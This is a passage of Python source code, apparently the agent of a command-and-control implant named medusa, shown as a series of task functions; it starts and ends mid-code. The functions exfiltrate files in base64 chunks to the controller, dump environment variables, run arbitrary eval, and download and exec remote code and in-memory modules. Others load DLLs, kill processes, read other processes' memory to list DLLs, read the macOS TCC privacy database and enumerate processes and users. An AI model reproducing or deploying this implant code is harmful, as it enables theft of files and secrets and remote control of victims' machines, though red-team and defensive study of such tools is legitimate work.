that # preserve the original directory structure inside the zip. file_list = [] archive_base_dir = None # Check if path is a list of files/directories if isinstance(path, list): for p in path: abs_p = p if os.path.isabs(p) else os.path.join(self.current_directory, p) if os.path.isdir(abs_p): for root, dirs, files in os.walk(abs_p): for fname in files: file_list.append(os.path.join(root, fname)) else: file_list.append(abs_p) # Anchor arcnames at the filesystem root so each entry's full path is # preserved inside the archive (e.g. "etc/nginx/nginx.conf"). archive_base_dir = os.sep elif isinstance(path, str): # Try to parse a JSON list from a string (backward compat) stripped = path.strip() if stripped.startswith("["): try: parsed = json.loads(stripped) if isinstance(parsed, list): for f in parsed: abs_f = f if os.path.isabs(f) else os.path.join(self.current_directory, f) if os.path.isdir(abs_f): for root, dirs, files in os.walk(abs_f): for fname in files: file_list.append(os.path.join(root, fname)) else: file_list.append(abs_f) archive_base_dir = os.sep else: return "Invalid path value: {}".format(path) except Exception as e: return "Failed to parse path as JSON list: {} - {}".format(path, e) else: # Normalise to absolute path abs_path = path if os.path.isabs(path) \ else os.path.join(self.current_directory, path) if os.path.isdir(abs_path): archive_base_dir = os.path.dirname(abs_path) for root, dirs, files in os.walk(abs_path): for fname in files: file_list.append(os.path.join(root, fname)) elif os.path.isfile(abs_path): archive_base_dir = os.path.dirname(abs_path) file_list = [abs_path] else: return "Path does not exist or is not accessible: {}".format(abs_path) else: return "Invalid path argument type: {}".format(type(path)) if not file_list: return "No files found to download." # Cache the task reference once to avoid repeated O(n) lookups inside loops task_ref = [task for task in self.taskings if task["task_id"] == task_id][0] results = [] if mode == "iterative": # Download each file individually using the same chunked approach as download() for file_path in file_list: if task_ref["stopped"]: return "Job stopped." if not os.path.isfile(file_path): results.append("Skipped (not a file): {}".format(file_path)) continue file_size = os.stat(file_path).st_size total_chunks = int(file_size / CHUNK_SIZE) + (file_size % CHUNK_SIZE > 0) data = { "action": "post_response", "responses": [{ "task_id": task_id, "download": { "total_chunks": total_chunks, "full_path": file_path, "chunk_size": CHUNK_SIZE } }] } initial_response = self.postMessageAndRetrieveResponse(data) file_id = initial_response["responses"][0]["file_id"] chunk_num = 1 with open(file_path, 'rb') as f: while True: if task_ref["stopped"]: return "Job stopped." content = f.read(CHUNK_SIZE) if not content: break data = { "action": "post_response", "responses": [{ "task_id": task_id, "download": { "chunk_num": chunk_num, "file_id": file_id, "chunk_data": base64.b64encode(content).decode() } }] } chunk_num += 1 self.postMessageAndRetrieveResponse(data) results.append(json.dumps({"agent_file_id": file_id, "file_path": file_path})) return "\n".join(results) else: # Archive mode: build an in-memory zip and send it as a single file. # Directory structure is preserved inside the archive using arcnames # computed relative to archive_base_dir. zip_buffer = io.BytesIO() with zipfile.ZipFile(zip_buffer, mode='w', compression=zipfile.ZIP_DEFLATED) as zf: for file_path in file_list: if task_ref["stopped"]: return "Job stopped." if not os.path.isfile(file_path): continue # Preserve the original directory structure: compute the path # relative to archive_base_dir so that sub-directories appear as # real zip entries (e.g. nginx/conf.d/default.conf) rather than # flat names with underscores. arcname = os.path.relpath(file_path, archive_base_dir) zf.write(file_path, arcname) zip_data = zip_buffer.getvalue() zip_buffer.close() archive_name = "download_bulk_{}.zip".format(task_id) total_chunks = int(len(zip_data) / CHUNK_SIZE) + (len(zip_data) % CHUNK_SIZE > 0) data = { "action": "post_response", "responses": [{ "task_id": task_id, "download": { "total_chunks": total_chunks, "full_path": archive_name, "chunk_size": CHUNK_SIZE } }] } initial_response = self.postMessageAndRetrieveResponse(data) file_id = initial_response["responses"][0]["file_id"] chunk_num = 1 offset = 0 while offset < len(zip_data): if task_ref["stopped"]: return "Job stopped." chunk = zip_data[offset:offset + CHUNK_SIZE] data = { "action": "post_response", "responses": [{ "task_id": task_id, "download": { "chunk_num": chunk_num, "file_id": file_id, "chunk_data": base64.b64encode(chunk).decode() } }] } chunk_num += 1 offset += CHUNK_SIZE self.postMessageAndRetrieveResponse(data) return json.dumps({"agent_file_id": file_id}) ================================================ FILE: Payload_Type/medusa/medusa/agent_code/env.py ================================================ def env(self, task_id): return "\n".join(["{}: {}".format(x, os.environ[x]) for x in os.environ]) ================================================ FILE: Payload_Type/medusa/medusa/agent_code/eval_code.py ================================================ def eval_code(self, task_id, command): return eval(command) ================================================ FILE: Payload_Type/medusa/medusa/agent_code/exit.py ================================================ def exit(self, task_id): os._exit(0) ================================================ FILE: Payload_Type/medusa/medusa/agent_code/jobkill.py ================================================ def jobkill(self, task_id, target_task_id): task = [task for task in self.taskings if task["task_id"] == target_task_id] task[0]["stopped"] = True ================================================ FILE: Payload_Type/medusa/medusa/agent_code/jobs.py ================================================ def jobs(self, task_id): out = [t.name.split(":") for t in threading.enumerate() \ if t.name != "MainThread" and "a2m" not in t.name \ and "m2a" not in t.name and t.name != "jobs:{}".format(task_id) ] if len(out) > 0: return json.dumps({ "jobs": out }) else: return "No long running jobs!" ================================================ FILE: Payload_Type/medusa/medusa/agent_code/kill.py3 ================================================ def kill(self, task_id, process_id): import ctypes, ctypes.wintypes from ctypes import GetLastError NTSTATUS = ctypes.wintypes.LONG def _check_bool(result, func, args): if not result: raise ctypes.WinError(ctypes.get_last_error()) return args Kernel32 = ctypes.WinDLL('kernel32.dll') OpenProcess = Kernel32.OpenProcess OpenProcess.restype = ctypes.wintypes.HANDLE CloseHandle = Kernel32.CloseHandle CloseHandle.errcheck = _check_bool TerminateProcess = Kernel32.TerminateProcess TerminateProcess.restype = ctypes.wintypes.BOOL PROCESS_TERMINATE = 0x0001 PROCESS_QUERY_INFORMATION = 0x0400 try: hProcess = OpenProcess(PROCESS_TERMINATE | PROCESS_QUERY_INFORMATION, False, process_id) if hProcess: TerminateProcess(hProcess, 1) CloseHandle(hProcess) except Exception as e: return e ================================================ FILE: Payload_Type/medusa/medusa/agent_code/list_apps.py2 ================================================ def list_apps(self, task_id): import Cocoa app_json = [] apps = Cocoa.NSWorkspace.sharedWorkspace().runningApplications() for app in apps: try: app_data = { "pid": str(app.processIdentifier()), "name": str(app.localizedName()), "exec_url": str(app.executableURL()) } app_json.append(app_data) except: pass return json.dumps({ "apps": app_json }) ================================================ FILE: Payload_Type/medusa/medusa/agent_code/list_dlls.py3 ================================================ def list_dlls(self, task_id, process_id=0): import sys, os.path, ctypes, ctypes.wintypes from ctypes import create_unicode_buffer, GetLastError import re import datetime def _check_bool(result, func, args): if not result: raise ctypes.WinError(ctypes.get_last_error()) return args PULONG = ctypes.POINTER(ctypes.wintypes.ULONG) ULONG_PTR = ctypes.wintypes.LPVOID SIZE_T = ctypes.c_size_t NTSTATUS = ctypes.wintypes.LONG PVOID = ctypes.wintypes.LPVOID PROCESSINFOCLASS = ctypes.wintypes.ULONG Kernel32 = ctypes.WinDLL('kernel32.dll') OpenProcess = Kernel32.OpenProcess OpenProcess.restype = ctypes.wintypes.HANDLE CloseHandle = Kernel32.CloseHandle CloseHandle.errcheck = _check_bool GetCurrentProcess = Kernel32.GetCurrentProcess GetCurrentProcess.restype = ctypes.wintypes.HANDLE GetCurrentProcess.argtypes = () ReadProcessMemory = Kernel32.ReadProcessMemory ReadProcessMemory.errcheck = _check_bool ReadProcessMemory.argtypes = ( ctypes.wintypes.HANDLE, ctypes.wintypes.LPCVOID, ctypes.wintypes.LPVOID, SIZE_T, ctypes.POINTER(SIZE_T)) # WINAPI Definitions PROCESS_VM_READ = 0x0010 PROCESS_QUERY_INFORMATION = 0x0400 ERROR_INVALID_HANDLE = 0x0006 ERROR_PARTIAL_COPY = 0x012B WIN32_PROCESS_TIMES_TICKS_PER_SECOND = 1e7 MAX_PATH = 260 PROCESS_TERMINATE = 0x0001 PROCESS_QUERY_INFORMATION = 0x0400 ProcessBasicInformation = 0 ProcessDebugPort = 7 ProcessWow64Information = 26 ProcessImageFileName = 27 ProcessBreakOnTermination = 29 STATUS_UNSUCCESSFUL = NTSTATUS(0xC0000001) STATUS_INFO_LENGTH_MISMATCH = NTSTATUS(0xC0000004).value STATUS_INVALID_HANDLE = NTSTATUS(0xC0000008).value STATUS_OBJECT_TYPE_MISMATCH = NTSTATUS(0xC0000024).value class RemotePointer(ctypes._Pointer): def __getitem__(self, key): # TODO: slicing size = None if not isinstance(key, tuple): raise KeyError('must be (index, handle[, size])') if len(key) > 2: index, handle, size = key else: index, handle = key if isinstance(index, slice): raise TypeError('slicing is not supported') dtype = self._type_ offset = ctypes.sizeof(dtype) * index address = PVOID.from_buffer(self).value + offset simple = issubclass(dtype, ctypes._SimpleCData) if simple and size is not None: if dtype._type_ == ctypes.wintypes.WCHAR._type_: buf = (ctypes.wintypes.WCHAR * (size // 2))() else: buf = (ctypes.c_char * size)() else: buf = dtype() nread = SIZE_T() Kernel32.ReadProcessMemory(handle, address, ctypes.byref(buf), ctypes.sizeof(buf), ctypes.byref(nread)) if simple: return buf.value return buf _remote_pointer_cache = {} def RPOINTER(dtype): if dtype in _remote_pointer_cache: return _remote_pointer_cache[dtype] name = 'RP_%s' % dtype.__name__ ptype = type(name, (RemotePointer,), {'_type_': dtype}) _remote_pointer_cache[dtype] = ptype return ptype RPWSTR = RPOINTER(ctypes.wintypes.WCHAR) class UNICODE_STRING(ctypes.Structure): _fields_ = (('Length', ctypes.wintypes.USHORT), ('MaximumLength', ctypes.wintypes.USHORT), ('Buffer', RPWSTR)) class LIST_ENTRY(ctypes.Structure): pass RPLIST_ENTRY = RPOINTER(LIST_ENTRY) LIST_ENTRY._fields_ = (('Flink', RPLIST_ENTRY), ('Blink', RPLIST_ENTRY)) class LDR_DATA_TABLE_ENTRY(ctypes.Structure): _fields_ = (('Reserved1', PVOID * 2), ('InMemoryOrderLinks', LIST_ENTRY), ('Reserved2', PVOID * 2), ('DllBase', PVOID), ('EntryPoint', PVOID), ('Reserved3', PVOID), ('FullDllName', UNICODE_STRING), ('Reserved4', ctypes.wintypes.BYTE * 8), ('Reserved5', PVOID * 3), ('CheckSum', PVOID), ('TimeDateStamp', ctypes.wintypes.ULONG)) RPLDR_DATA_TABLE_ENTRY = RPOINTER(LDR_DATA_TABLE_ENTRY) class PEB_LDR_DATA(ctypes.Structure): _fields_ = (('Reserved1', ctypes.wintypes.BYTE * 8), ('Reserved2', PVOID * 3), ('InMemoryOrderModuleList', LIST_ENTRY)) RPPEB_LDR_DATA = RPOINTER(PEB_LDR_DATA) class RTL_USER_PROCESS_PARAMETERS(ctypes.Structure): _fields_ = (('Reserved1', ctypes.wintypes.BYTE * 16), ('Reserved2', PVOID * 10), ('ImagePathName', UNICODE_STRING), ('CommandLine', UNICODE_STRING)) RPRTL_USER_PROCESS_PARAMETERS = RPOINTER(RTL_USER_PROCESS_PARAMETERS) PPS_POST_PROCESS_INIT_ROUTINE = PVOID class PEB(ctypes.Structure): _fields_ = (('Reserved1', ctypes.wintypes.BYTE * 2), ('BeingDebugged', ctypes.wintypes.BYTE), ('Reserved2', ctypes.wintypes.BYTE * 1), ('Reserved3', PVOID * 2), ('Ldr', RPPEB_LDR_DATA), ('ProcessParameters', RPRTL_USER_PROCESS_PARAMETERS), ('Reserved4', ctypes.wintypes.BYTE * 104), ('Reserved5', PVOID * 52), ('PostProcessInitRoutine', PPS_POST_PROCESS_INIT_ROUTINE), ('Reserved6', ctypes.wintypes.BYTE * 128), ('Reserved7', PVOID * 1), ('SessionId', ctypes.wintypes.ULONG)) RPPEB = RPOINTER(PEB) class PROCESS_BASIC_INFORMATION(ctypes.Structure): _fields_ = (('Reserved1', PVOID), ('PebBaseAddress', RPPEB), ('Reserved2', PVOID * 2), ('UniqueProcessId', ULONG_PTR), ('InheritedFromUniqueProcessId', ULONG_PTR)) def NtError(status): import sys descr = 'NTSTATUS(%#08x) ' % (status % 2**32,) if status & 0xC0000000 == 0xC0000000: descr += '[Error]' elif status & 0x80000000 == 0x80000000: descr += '[Warning]' elif status & 0x40000000 == 0x40000000: descr += '[Information]' else: descr += '[Success]' if sys.version_info[:2] < (3, 3): return WindowsError(status, descr) return OSError(None, descr, None, status) ntdll = ctypes.WinDLL('ntdll.dll') NtQueryInformationProcess = ntdll.NtQueryInformationProcess NtQueryInformationProcess.restype = NTSTATUS NtQueryInformationProcess.argtypes = ( ctypes.wintypes.HANDLE, PROCESSINFOCLASS, PVOID, ctypes.wintypes.ULONG, PULONG) class ProcessInformation(object): _close_handle = False _closed = False _module_names = None def __init__(self, process_id=None, handle=None): if process_id is None and handle is None: handle = GetCurrentProcess() elif handle is None: handle = OpenProcess(PROCESS_VM_READ | PROCESS_QUERY_INFORMATION, False, process_id) self._close_handle = True self._handle = handle self._query_info() if process_id is not None and not self._ldr: return def __del__(self, CloseHandle=CloseHandle): if self._close_handle and not self._closed: try: CloseHandle(self._handle) except WindowsError as e: pass self._closed = True def _query_info(self): info = PROCESS_BASIC_INFORMATION() handle = self._handle status = NtQueryInformationProcess(handle, ProcessBasicInformation, ctypes.byref(info), ctypes.sizeof(info), None) if status < 0: raise NtError(status) self._peb = peb = info.PebBaseAddress[0, handle] self._ldr = peb.Ldr[0, handle] def _modules_iter(self): headaddr = (PVOID.from_buffer(self._peb.Ldr).value + PEB_LDR_DATA.InMemoryOrderModuleList.offset) offset = LDR_DATA_TABLE_ENTRY.InMemoryOrderLinks.offset pentry = self._ldr.InMemoryOrderModuleList.Flink while pentry: pentry_void = PVOID.from_buffer_copy(pentry) if pentry_void.value == headaddr: break pentry_void.value -= offset pmod = RPLDR_DATA_TABLE_ENTRY.from_buffer(pentry_void) mod = pmod[0, self._handle] yield mod pentry = LIST_ENTRY.from_buffer(mod, offset).Flink def update_module_names(self): names = [] for m in self._modules_iter(): ustr = m.FullDllName name = ustr.Buffer[0, self._handle, ustr.Length] names.append(name) self._module_names = names @property def module_names(self): if self._module_names is None: self.update_module_names() return self._module_names try: if not process_id: pi = ProcessInformation() else: pi = ProcessInformation(process_id) return json.dumps({ "dlls": pi.module_names }) except Exception as e: return e ================================================ FILE: Payload_Type/medusa/medusa/agent_code/list_modules.py ================================================ def list_modules(self, task_id, module_name=""): if module_name: if module_name in self.moduleRepo.keys(): return "\n".join(self.moduleRepo[module_name].namelist()) else: return "{} not found in loaded modules".format(module_name) else: return "\n".join(self.moduleRepo.keys()) ================================================ FILE: Payload_Type/medusa/medusa/agent_code/list_tcc.py ================================================ def list_tcc(self,task_id,tcc=True, db="/Library/Application Support/com.apple.TCC/TCC.db"): import sqlite3 with sqlite3.connect(db) as con: columns = [] for row in con.execute('PRAGMA table_info("access")'): columns.append(row) tcc = [] for row in con.execute('SELECT * FROM "access"'): tcc.append(row) results = [] for entry in tcc: line={} count = 0 for ent in entry: if columns[count][2] == "BLOB" and ent != None: line[columns[count][1]] = base64.b64encode(ent).decode() else: line[columns[count][1]] = str(ent) count+=1 results.append(line) tcc_results = {} tcc_results["entries"] = results return json.dumps({ "tcc": results }) ================================================ FILE: Payload_Type/medusa/medusa/agent_code/load.py ================================================ def load(self, task_id, file_id, command): total_chunks = 1 chunk_num = 0 cmd_code = "" while (chunk_num < total_chunks): if [task for task in self.taskings if task["task_id"] == task_id][0]["stopped"]: return "Job stopped." data = { "action": "post_response", "responses": [ { "upload": { "chunk_size": CHUNK_SIZE, "file_id": file_id, "chunk_num": chunk_num+1 }, "task_id": task_id } ]} response = self.postMessageAndRetrieveResponse(data) chunk = response["responses"][0] chunk_num+=1 total_chunks = chunk["total_chunks"] cmd_code += base64.b64decode(chunk["chunk_data"]).decode() if cmd_code: exec(cmd_code.replace("\n ","\n")[4:]) setattr(medusa, command, eval(command)) cmd_list = [{"action": "add", "cmd": command}] responses = [{ "task_id": task_id, "user_output": "Loaded command: {}".format(command), "commands": cmd_list, "completed": True }] message = { "action": "post_response", "responses": responses } response_data = self.postMessageAndRetrieveResponse(message) else: return "Failed to upload '{}' command".format(command) ================================================ FILE: Payload_Type/medusa/medusa/agent_code/load_dll.py ================================================ def load_dll(self, task_id, dllpath, dllexport): from ctypes import WinDLL dll_file_path = dllpath if dllpath[0] == os.sep \ else os.path.join(self.current_directory,dllpath) loaded_dll = WinDLL(dll_file_path) eval("{}.{}()".format("loaded_dll",dllexport)) return "[*] {} Loaded.".format(dllpath) ================================================ FILE: Payload_Type/medusa/medusa/agent_code/load_module.py2 ================================================ def load_module(self, task_id, file, module_name): import zipfile, io class CFinder(object): def __init__(self, repoName, instance): self.moduleRepo = instance.moduleRepo self.repoName = repoName self._source_cache = {} def _get_info(self, repoName, fullname): parts = fullname.split('.') submodule = parts[-1] modulepath = '/'.join(parts) _search_order = [('.py', False), ('/__init__.py', True)] for suffix, is_package in _search_order: relpath = modulepath + suffix try: self.moduleRepo[repoName].getinfo(relpath) except KeyError: pass else: return submodule, is_package, relpath msg = ('Unable to locate module %s in the %s repo' % (submodule, repoName)) raise ImportError(msg) def _get_source(self, repoName, fullname): submodule, is_package, relpath = self._get_info(repoName, fullname) fullpath = '%s/%s' % (repoName, relpath) if relpath in self._source_cache: source = self._source_cache[relpath] return submodule, is_package, fullpath, source try: source = self.moduleRepo[repoName].read(relpath) source = source.replace(b'\r\n', b'\n') source = source.replace(b'\r', b'\n') self._source_cache[relpath] = source return submodule, is_package, fullpath, source except: raise ImportError("Unable to obtain source for module %s" % (fullpath)) def find_module(self, fullname, path=None): try: submodule, is_package, relpath = self._get_info(self.repoName, fullname) except ImportError: return None else: return self def load_module(self, fullname): import imp submodule, is_package, fullpath, source = self._get_source(self.repoName, fullname) code = compile(source, fullpath, 'exec') mod = sys.modules.setdefault(fullname, imp.new_module(fullname)) mod.__loader__ = self mod.__file__ = fullpath mod.__name__ = fullname if is_package: mod.__path__ = [os.path.dirname(mod.__file__)] exec code in mod.__dict__ return mod def get_data(self, fullpath): prefix = os.path.join(self.repoName, '') if not fullpath.startswith(prefix): raise IOError('Path %r does not start with module name %r', (fullpath, prefix)) relpath = fullpath[len(prefix):] try: return self.moduleRepo[self.repoName].read(relpath) except KeyError: raise IOError('Path %r not found in repo %r' % (relpath, self.repoName)) def is_package(self, fullname): """Return if the module is a package""" submodule, is_package, relpath = self._get_info(self.repoName, fullname) return is_package def get_code(self, fullname): submodule, is_package, fullpath, source = self._get_source(self.repoName, fullname) return compile(source, fullpath, 'exec') if module_name in self.moduleRepo.keys(): return "{} module already loaded.".format(module_name) total_chunks = 1 chunk_num = 0 module_zip = bytearray() while (chunk_num < total_chunks): if [task for task in self.taskings if task["task_id"] == task_id][0]["stopped"]: return "Job stopped." data = { "action": "post_response", "responses": [ { "upload": { "chunk_size": CHUNK_SIZE, "file_id": file, "chunk_num": chunk_num+1 }, "task_id": task_id } ]} response = self.postMessageAndRetrieveResponse(data) chunk = response["responses"][0] total_chunks = chunk["total_chunks"] chunk_num+=1 module_zip.extend(base64.b64decode(chunk["chunk_data"])) if module_zip: self.moduleRepo[module_name] = zipfile.ZipFile(io.BytesIO(module_zip)) if module_name not in self._meta_cache: finder = CFinder(module_name, self) self._meta_cache[module_name] = finder sys.meta_path.append(finder) else: return "Failed to download in-memory module" ================================================ FILE: Payload_Type/medusa/medusa/agent_code/load_module.py3 ================================================ def load_module(self, task_id, file, module_name): import zipfile, io class CFinder(object): def __init__(self, repoName, instance): self.moduleRepo = instance.moduleRepo self.repoName = repoName self._source_cache = {} def _get_info(self, repoName, fullname): parts = fullname.split('.') submodule = parts[-1] modulepath = '/'.join(parts) _search_order = [('.py', False), ('/__init__.py', True)] for suffix, is_package in _search_order: relpath = modulepath + suffix try: self.moduleRepo[repoName].getinfo(relpath) except KeyError: pass else: return submodule, is_package, relpath msg = ('Unable to locate module %s in the %s repo' % (submodule, repoName)) raise ImportError(msg) def _get_source(self, repoName, fullname): submodule, is_package, relpath = self._get_info(repoName, fullname) fullpath = '%s/%s' % (repoName, relpath) if relpath in self._source_cache: source = self._source_cache[relpath] return submodule, is_package, fullpath, source try: source = self.moduleRepo[repoName].read(relpath) source = source.replace(b'\r\n', b'\n') source = source.replace(b'\r', b'\n') self._source_cache[relpath] = source return submodule, is_package, fullpath, source except: raise ImportError("Unable to obtain source for module %s" % (fullpath)) def find_module(self, fullname, path=None): try: submodule, is_package, relpath = self._get_info(self.repoName, fullname) except ImportError: return None else: return self def load_module(self, fullname): import types submodule, is_package, fullpath, source = self._get_source(self.repoName, fullname) code = compile(source, fullpath, 'exec') mod = sys.modules.setdefault(fullname, types.ModuleType(fullname)) mod.__loader__ = self mod.__file__ = fullpath mod.__name__ = fullname if is_package: mod.__path__ = [os.path.dirname(mod.__file__)] exec(code, mod.__dict__) return mod def get_data(self, fullpath): prefix = os.path.join(self.repoName, '') if not fullpath.startswith(prefix): raise IOError('Path %r does not start with module name %r', (fullpath, prefix)) relpath = fullpath[len(prefix):] try: return self.moduleRepo[self.repoName].read(relpath) except KeyError: raise IOError('Path %r not found in repo %r' % (relpath, self.repoName)) def is_package(self, fullname): """Return if the module is a package""" submodule, is_package, relpath = self._get_info(self.repoName, fullname) return is_package def get_code(self, fullname): submodule, is_package, fullpath, source = self._get_source(self.repoName, fullname) return compile(source, fullpath, 'exec') if module_name in self.moduleRepo.keys(): return "{} module already loaded.".format(module_name) total_chunks = 1 chunk_num = 0 module_zip = bytearray() while (chunk_num < total_chunks): if [task for task in self.taskings if task["task_id"] == task_id][0]["stopped"]: return "Job stopped." data = { "action": "post_response", "responses": [ { "upload": { "chunk_size": CHUNK_SIZE, "file_id": file, "chunk_num": chunk_num+1 }, "task_id": task_id } ]} response = self.postMessageAndRetrieveResponse(data) chunk = response["responses"][0] total_chunks = chunk["total_chunks"] chunk_num+=1 module_zip.extend(base64.b64decode(chunk["chunk_data"])) if module_zip: self.moduleRepo[module_name] = zipfile.ZipFile(io.BytesIO(module_zip)) if module_name not in self._meta_cache: finder = CFinder(module_name, self) self._meta_cache[module_name] = finder sys.meta_path.append(finder) else: return "Failed to download in-memory module" ================================================ FILE: Payload_Type/medusa/medusa/agent_code/load_script.py ================================================ def load_script(self, task_id, file): total_chunks = 1 chunk_num = 0 cmd_code = "" while (chunk_num < total_chunks): if [task for task in self.taskings if task["task_id"] == task_id][0]["stopped"]: return "Job stopped." data = { "action": "post_response", "responses": [ { "upload": { "chunk_size": CHUNK_SIZE, "file_id": file, "chunk_num": chunk_num+1 }, "task_id": task_id } ]} response = self.postMessageAndRetrieveResponse(data) chunk = response["responses"][0] chunk_num+=1 total_chunks = chunk["total_chunks"] cmd_code += base64.b64decode(chunk["chunk_data"]).decode() if cmd_code: exec(cmd_code) else: return "Failed to load script" ================================================ FILE: Payload_Type/medusa/medusa/agent_code/ls.py2 ================================================ def ls(self, task_id, path, file_browser=False): if path == ".": file_path = self.current_directory else: file_path = path if path[0] == os.sep \ else os.path.join(self.current_directory,path) file_details = os.stat(file_path) target_is_file = os.path.isfile(file_path) target_name = os.path.basename(file_path.rstrip(os.sep)) if file_path != os.sep else os.sep file_browser = { "host": socket.gethostname(), "is_file": target_is_file, "permissions": {"octal": oct(file_details.st_mode)[-3:]}, "name": target_name if target_name not in [".", "" ] \ else os.path.basename(self.current_directory.rstrip(os.sep)), "parent_path": os.path.abspath(os.path.join(file_path, os.pardir)), "success": True, "access_time": int(file_details.st_atime * 1000), "modify_time": int(file_details.st_mtime * 1000), "size": file_details.st_size, "update_deleted": True, } files = [] if not target_is_file: for entry in os.listdir(file_path): full_path = os.path.join(file_path, entry) file = {} file['name'] = entry file['is_file'] = True if os.path.isfile(full_path) else False try: file_details = os.stat(full_path) file["permissions"] = { "octal": oct(file_details.st_mode)[-3:]} file["access_time"] = int(file_details.st_atime * 1000) file["modify_time"] = int(file_details.st_mtime * 1000) file["size"] = file_details.st_size except OSError as e: pass files.append(file) file_browser["files"] = files task = [task for task in self.taskings if task["task_id"] == task_id] task[0]["file_browser"] = file_browser output = { "files": files, "parent_path": os.path.abspath(os.path.join(file_path, os.pardir)), "name": target_name if target_name not in [".", ""] \ else os.path.basename(self.current_directory.rstrip(os.sep)) } return json.dumps(output) ================================================ FILE: Payload_Type/medusa/medusa/agent_code/ls.py3 ================================================ def ls(self, task_id, path, file_browser=False): if path == ".": file_path = self.current_directory else: file_path = path if path[0] == os.sep \ else os.path.join(self.current_directory,path) file_details = os.stat(file_path) target_is_file = os.path.isfile(file_path) target_name = os.path.basename(file_path.rstrip(os.sep)) if file_path != os.sep else os.sep file_browser = { "host": socket.gethostname(), "is_file": target_is_file, "permissions": {"octal": oct(file_details.st_mode)[-3:]}, "name": target_name if target_name not in [".", "" ] \ else os.path.basename(self.current_directory.rstrip(os.sep)), "parent_path": os.path.abspath(os.path.join(file_path, os.pardir)), "success": True, "access_time": int(file_details.st_atime * 1000), "modify_time": int(file_details.st_mtime * 1000), "size": file_details.st_size, "update_deleted": True, } files = [] if not target_is_file: with os.scandir(file_path) as entries: for entry in entries: file = {} file['name'] = entry.name file['is_file'] = True if entry.is_file() else False try: file_details = os.stat(os.path.join(file_path, entry.name)) file["permissions"] = { "octal": oct(file_details.st_mode)[-3:]} file["access_time"] = int(file_details.st_atime * 1000) file["modify_time"] = int(file_details.st_mtime * 1000) file["size"] = file_details.st_size except OSError as e: pass files.append(file) file_browser["files"] = files task = [task for task in self.taskings if task["task_id"] == task_id] task[0]["file_browser"] = file_browser output = { "files": files, "parent_path": os.path.abspath(os.path.join(file_path, os.pardir)), "name": target_name if target_name not in [".", ""] \ else os.path.basename(self.current_directory.rstrip(os.sep)) } return json.dumps(output) ================================================ FILE: Payload_Type/medusa/medusa/agent_code/mv.py ================================================ def mv(self, task_id, source, destination): import shutil source_path = source if source[0] == os.sep \ else os.path.join(self.current_directory,source) dest_path = destination if destination[0] == os.sep \ else os.path.join(self.current_directory,destination) shutil.move(source_path, dest_path) ================================================ FILE: Payload_Type/medusa/medusa/agent_code/pip_freeze.py ================================================ def pip_freeze(self, task_id): out="" try: import pkg_resources installed_packages = pkg_resources.working_set installed_packages_list = sorted(["%s==%s" % (i.key, i.version) for i in installed_packages]) return "\n".join(installed_packages_list) except: out+="[*] pkg_resources module not installed.\n" try: from pip._internal.operations.freeze import freeze installed_packages_list = freeze(local_only=True) return "\n".join(installed_packages_list) except: out+="[*] pip module not installed.\n" try: import pkgutil installed_packages_list = [ a for _, a, _ in pkgutil.iter_modules()] return "\n".join(installed_packages_list) except: out+="[*] pkgutil module not installed.\n" return out+"[!] No modules available to list installed packages." ================================================ FILE: Payload_Type/medusa/medusa/agent_code/ps.py2 ================================================ def ps(self, task_id): def get_user_id_map(): user_map = {} # get username from uid with open("/etc/passwd", "r") as f: passwd = f.readlines() for line in passwd: user_line_arr = line.split(":") username = user_line_arr[0].strip() uid = user_line_arr[2].strip() user_map[uid] = username return user_map processes = [] if os.name == 'posix': # Get the user map user_map = get_user_id_map() # get list of PIDs by performing a directory listing on /proc pids = [pid for pid in os.listdir("/proc") if pid.isdigit()] # loop through each PID and output information similar to ps command for pid in pids: # construct path to status file status_path = "/proc/%s/status" % str(pid) # read in the status file - bail if process dies before we read the status file try: with open(status_path, "r") as f: status = f.readlines() except Exception as e: continue # construct path to status file cmdline_path = "/proc/%s/cmdline" % str(pid) # read in the status file with open(cmdline_path, "r") as f: cmdline = f.read() cmd_arr = cmdline.split("\x00") cmdline = " ".join(cmd_arr) # extract relevant information from status file name = "" ppid = "" uid = "" username = "" for line in status: if line.startswith("Name:"): name = line.split()[1].strip() elif line.startswith("PPid:"): ppid = line.split()[1].strip() elif line.startswith("Uid:"): uid = line.split()[1].strip() # Map the uid to the username if uid in user_map: username = user_map[uid] process = {"process_id": int(pid), "parent_process_id": int(ppid), "user_id": username, "name": name, "bin_path": cmdline} processes.append(process) task = [task for task in self.taskings if task["task_id"] == task_id] task[0]["processes"] = processes return json.dumps({ "processes": processes }) ================================================ FILE: Payload_Type/medusa/medusa/agent_code/ps.py3 ================================================ def ps(self, task_id): import os processes = [] if os.name == 'posix': def get_user_id_map(): user_map = {} # get username from uid with open("/etc/passwd", "r") as f: passwd = f.readlines() for line in passwd: user_line_arr = line.split(":") username = user_line_arr[0].strip() uid = user_line_arr[2].strip() user_map[uid] = username return user_map # Get the user map user_map = get_user_id_map() # get list of PIDs by performing a directory listing on /proc pids = [pid for pid in os.listdir("/proc") if pid.isdigit()] # loop through each PID and output information similar to ps command for pid in pids: # construct path to status file status_path = "/proc/%s/status" % str(pid) # read in the status file - bail if process dies before we read the status file try: with open(status_path, "r") as f: status = f.readlines() except Exception as e: continue # construct path to status file cmdline_path = "/proc/%s/cmdline" % str(pid) # read in the status file with open(cmdline_path, "r") as f: cmdline = f.read() cmd_arr = cmdline.split("\x00") cmdline = " ".join(cmd_arr) # extract relevant information from status file name = "" ppid = "" uid = "" username = "" for line in status: if line.startswith("Name:"): name = line.split()[1].strip() elif line.startswith("PPid:"): ppid = line.split()[1].strip() elif line.startswith("Uid:"): uid = line.split()[1].strip() # Map the uid to the username if uid in user_map: username = user_map[uid] process = {"process_id": int(pid), "parent_process_id": int(ppid), "user_id": username, "name": name, "bin_path": cmdline} processes.append(process) elif os.name == 'nt': import sys, os.path, ctypes, ctypes.wintypes, re from ctypes import create_unicode_buffer, GetLastError def _check_bool(result, func, args): if not result: raise ctypes.WinError(ctypes.get_last_error()) return args PULONG = ctypes.POINTER(ctypes.wintypes.ULONG) ULONG_PTR = ctypes.wintypes.LPVOID SIZE_T = ctypes.c_size_t NTSTATUS = ctypes.wintypes.LONG PVOID = ctypes.wintypes.LPVOID PROCESSINFOCLASS = ctypes.wintypes.ULONG Psapi = ctypes.WinDLL('Psapi.dll') EnumProcesses = Psapi.EnumProcesses EnumProcesses.restype = ctypes.wintypes.BOOL GetProcessImageFileName = Psapi.GetProcessImageFileNameA GetProcessImageFileName.restype = ctypes.wintypes.DWORD Kernel32 = ctypes.WinDLL('kernel32.dll') OpenProcess = Kernel32.OpenProcess OpenProcess.restype = ctypes.wintypes.HANDLE CloseHandle = Kernel32.CloseHandle CloseHandle.errcheck = _check_bool IsWow64Process = 